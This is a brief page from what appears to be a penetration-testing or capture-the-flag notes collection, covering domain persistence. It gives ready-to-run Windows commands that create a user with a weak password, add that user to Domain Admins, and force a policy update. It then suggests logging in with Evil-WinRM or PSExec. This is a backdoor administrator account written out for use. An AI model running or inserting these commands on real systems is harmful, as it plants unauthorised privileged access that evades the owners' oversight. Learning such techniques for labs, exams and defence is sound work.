Persistence

  • Requires Domain Admin

  • For CTF/Exams I basically always just do this:

net user nemo “Password1!” /add
net group “Domain Admins” nemo /add /domain
gpupdate /force

  • Login with Evil-WinRM or PSExec

PreviousBloodhoundNextGroup Policy Attack Tools

Last updated